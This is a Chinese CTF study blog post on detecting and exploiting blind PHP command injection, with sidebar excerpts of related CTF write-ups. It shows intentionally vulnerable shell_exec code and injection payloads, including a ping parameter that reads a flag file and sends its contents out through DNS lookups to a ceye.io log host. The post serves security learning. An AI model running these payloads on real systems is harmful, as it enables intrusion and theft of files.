命令执行小记2

最新推荐文章于 2022-05-15 13:34:23 发布
最新推荐文章于 2022-05-15 13:34:23 发布
阅读量4.6k 收藏
点赞数 2
分类专栏: CTF PHP 文章标签: 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52387684/article/details/121600022
版权
CTF 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
PHP
4 篇文章 0 订阅
订阅专栏
命令执行分类

根据是否结果输出,分为回显和无回显命令执行两种类型

漏洞挖掘第一步:判断是否存在命令执行

方法:
1.根据页面响应延时
2.发送HTTP请求,HTTP服务端显示请求
3.发送DNS,DNS请求服务端显示请求
延时执行

在shell命令中,具有sleep命令可以完成延时执行。

ls -alh | sleep 3

PHP无回显代码漏洞

<?php
    highlight_file(__FILE__);
    $cmd = $_GET['cmd'];
    shell_exec($cmd);
?>

现象:

HTTP请求

curl发出http请求,那么在服务端可以查看验证是否发送http请求。

服务端设置监听80端口,等待连接,输出响应

nc -lvp 80
或 在python2中
python -m SimpleHTTPServer -p 80

curl 服务端IP地址:端口号

PHP无回显漏洞代码:

<?php
    highlight_file(__FILE__);
    $cmd = $_GET['cmd'];
    shell_exec($cmd);
?>
// 访问2.php?cmd=curl ip:26 ,如果服务端发现请求,那么存在命令执行漏洞

在这里插入图片描述

DNS请求

发出DNS请求,在请求中具有读取的数据。例如ping域名,那么会进行DNS请求。

推荐免费使用ceye.io或者dnslog.cn

<?php
    highlight_file(__FILE__);
    $cmd = $_GET['cmd'];
    shell_exec($cmd);
?>
// 访问1.php?cmd=ping -c 3 aaa.xxx.c05smm.dnslog.cn

dnslog
 <?php
    highlight_file(__FILE__);
    include("where_is_flag.php");
    $cmd='ping -c 3'.$_GET['a'];
    echo $cmd;
    shell_exec($cmd);
?>

思路:读取where_is_flag.php的内容

cat 可以读取文件内容,但是不能回显,此时可以理由dnslog在DNS请求中查询文件内容拼接域名的信息。

本地读取思路 cp

ping.php?a=;cp where_is_flag.php where_is_flag.txt

DNS请求读取思路

sed s/空格/没有任何内容/ 替换文本的空格为空,其中[[:space:]]代表代码中的空格。

ping.php?a=`cat where_is_flag.php | sed s/[[:space:]]//g`.f8q9lc.ceye.io

由于目前不支持ping特殊符号,所以替换内容

a=`cat where_is_flag.php|sed s/[[:space:]]//g|tr "<|?|$|{|}|'|;|=>" "0"`.f8q9lc.ceye.io


a=`cat where_is_flag.php|sed s/[[:space:]]//g|tr "<|?|$|{|}|'|;|=>" "1"`.f8q9lc.ceye.io

此时执行后,ceye.io后台的DNS请求中具有请求数据,查看即可的where_is_flag.php中的内容

00php0flag00flag0aaabbbccc00000.f8q9lc.ceye.io

11php1flag11flag1aaabbbccc11111.f8q9lc.ceye.io

小结:

1.命令执行分类:回显和无回显。

2.判断无回显的命令执行漏洞的三种方法:延时,HTTP请求,DNS请求

南舍QAQ
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[ctf学习]ssrf-gopher
小飒的博客
07-05 730
?url=127.0.0.1/flag.php 看到 这里不考虑使用file直接读取 f.php内容,尝试一下如何使用gopher 进行get传值 burp拦截 取前两句 ssrf_post 还是上面情况,如果是post Content-Length: 7是post传参的长度
2022网刃杯web
羽的博客
04-25 1501
signin 源码如下 <?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); ?> 很明显的ssrf漏洞。用dict协议探测了下3306、6379、9000端口。应该是都没
ctfshow web入门 序列化
Lumos427的博客
02-25 1359
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
ctfshow—SSRF详解
cosmoslin的博客
09-24 1281
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
ctfshow—PHP特性
cosmoslin的博客
09-14 2160
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
文件包含漏洞&伪协议
qq_62078839的博客
04-16 2238
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3443
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
安恒暑期培训7-24wp
jojohacker的博客
09-27 365
BUU UPLOAD COURSE 1 发现了一段php代码 <?php highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 蚁剑扫一下在根目录下发现flag或者?file=/flag出现flag [BSidesCF 2020]Had a bad day 构造category=php://filter/convert.base64-enc
Sqlite数据库sqlite3命令小记.txt
07-02
Sqlite数据库sqlite3命令小记
Beatles小记
03-02
这篇小记主要处于两方面考虑:首先,希望打破一提到海量数据分析,就只有hadoop基础上的一系列工具,更多的时候很多企业需要的是更轻量的设计(办喜酒杀猪杀鸡未必都要用一把刀),因此将开放平台基础分析组件重构...
python进行爬虫小记
01-15
python进行爬虫小记,主要用于python快速入门理解。
大方法的执行性能与调优过程小记
01-31
例如,把文章所附DEMO的play()方法的内容分别重复拷贝1、2、4、8、16、32次并依次运行,在我的机器(Hotspot_1.6u22/Windows)上得到的play()的执行消耗时间分别是28.43、54.72、106.28、214.41、419.30、1476.40...
ctfshow_反序列化
qq_45951598的博客
01-27 1495
文章目录WEB254web255 WEB254 源码: error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-
catflag web wp
m0_62761134的博客
02-07 534
命令执行之我在哪 <?php highlight_file(__FILE__); if(isset($_GET['cmd'])){ if(!preg_match('/php:\/\/|data:\/\/|phar:\/\/|phpinfo()|info|rm|find|flag|rm|\/|echo|\.|\\\|\*|\?/i',$_GET['cmd'])){ @eval($_GET['cmd']); }else{ echo "danger_stri
ctf刷题小结
quan9i的博客
05-15 6056
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
命令执行小记
weixin_52387684的博客
11-14 1945
命令执行 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下 就执行命令,可能会允许使用者通过改变 SPATH或程序执行环境的其他方面来执行一个恶意构造的代码 命令执行与代码执行区别 1. 命令执行漏洞:直接操作系统命令 2. 代码执行漏洞:靠执行脚本代码调用系统命令 命令执行(相关函数) 参考文档:PHP: 程序执行函数 - Manual System函数 string system( string command int& return_Var)
CTFSHOW WEB题目
qq_45655564的博客
08-09 2763
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
命令执行技巧
weixin_52387684的博客
11-30 3260
命令执行执行系统命令,因此利用Linux shell中的特性,从而达到绕过防御的效果 测试代码: <?php highlight_file(__FILE__); $name = $_GET['name']; $output=shell_exec('echo'.$name); echo $output; ?> Linux shell中分隔符 换行符(%0a)、回车符(%0d)、连续命令(;)、管道符(|)、逻辑符号(||、&&) 注意:在使用.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8236
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
protobuff使用小记
最新发布
05-31
Protobuf是一种高效的序列化协议,可以用于数据交换和数据存储。它的主要优势是大小小,速度快,可扩展性强。下面是使用Protobuf的一些小记: 1. 定义消息格式 首先,需要定义消息格式,以便Protobuf可以将数据序列化和反序列化。消息格式定义在.proto文件中,使用protobuf语言编写。例如,下面是一个简单的消息格式定义: ``` syntax = "proto3"; message Person { string name = 1; int32 age = 2; } ``` 这个消息格式定义了一个名为Person的消息,包含两个字段:name和age。 2. 生成代码 一旦消息格式定义好,就可以使用Protobuf编译器生成代码。编译器将根据消息格式定义生成相应的代码,包括消息类、序列化和反序列化方法等。可以使用以下命令生成代码: ``` protoc --java_out=. message.proto ``` 这将生成一个名为message.pb.java的Java类,该类包含Person消息的定义以及相关方法。 3. 序列化和反序列化 一旦生成了代码,就可以使用Protobuf序列化和反序列化数据。例如,下面是一个示例代码,将一个Person对象序列化为字节数组,并将其反序列化为另一个Person对象: ``` Person person = Person.newBuilder() .setName("Alice") .setAge(25) .build(); byte[] bytes = person.toByteArray(); Person deserializedPerson = Person.parseFrom(bytes); ``` 这个示例代码创建了一个Person对象,将其序列化为字节数组,然后将其反序列化为另一个Person对象。在这个过程中,Protobuf使用生成的代码执行序列化和反序列化操作。 以上是使用Protobuf的一些基本步骤和注意事项,希望对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值